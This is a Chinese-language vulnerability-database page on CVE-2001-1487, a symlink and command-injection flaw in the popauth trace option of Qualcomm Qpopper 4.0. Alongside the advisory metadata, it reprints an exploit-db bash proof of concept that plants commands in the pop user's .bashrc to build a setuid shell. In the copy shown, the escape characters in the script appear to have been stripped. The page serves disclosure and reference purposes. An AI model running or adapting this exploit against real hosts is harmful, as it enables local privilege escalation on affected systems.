Qualcomm Qpopper popauth功能漏洞

Qualcomm Qpopper popauth功能漏洞

漏洞ID 1106547 漏洞类型 未知
发布时间 2001-12-18 更新时间 2001-12-31
图片[1]-Qualcomm Qpopper popauth功能漏洞-安全小百科CVE编号 CVE-2001-1487
图片[2]-Qualcomm Qpopper popauth功能漏洞-安全小百科CNNVD-ID CNNVD-200112-250
漏洞平台 Unix CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/21185
https://www.securityfocus.com/bid/88705
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-250
|漏洞详情
QualcommQpopper4.0及其早期版本的popauth功能存在漏洞。本地用户可以借助跟踪文件选项的符号链接攻击像pop用户一样覆盖任意文件并执行命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/3710/info

Qpopper is a freely available, open source Post Office Protocol server. It is maintained and distributed by Qualcomm.

When popauth is executed with the trace option, it does not correctly handle user-supplied input. A user can supply data to the popauth program through the trace flag which will cause the program to execute shell commands, and follow symbolic links.

This problem could be exploited to gain privilege elevation equal to that of the setuid bit on popauth, typically setuid as the pop user. 

#!/bin/bash

# popauth symlink follow vuln by IhaQueR
# this will create .bashrc for user pop
# and ~pop/sup suid shell

FILE=$(perl -e 'print "/tmp/blah1"ncd ~necho >blah.c "#include <stdio.h>nmain(){setreuid(geteuid(),getuid());execlp(\"bash\", \"bash\",NULL);}"ngcc blah.c -o supnchmod u+s supnecho donenn""')

ln -s /var/lib/pop/.bashrc "$FILE"

/usr/sbin/popauth -trace "$FILE"
|受影响的产品
Qualcomm qpopper 4.0
|参考资料

来源:XF
名称:qpopper-popauth-symlink(7707)
链接:http://xforce.iss.net/xforce/xfdb/7707

相关推荐: Multiple Vendor at(1) Vulnerability

Multiple Vendor at(1) Vulnerability 漏洞ID 1104909 漏洞类型 Access Validation Error 发布时间 1998-06-27 更新时间 1998-06-27 CVE编号 N/A CNNVD-ID N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享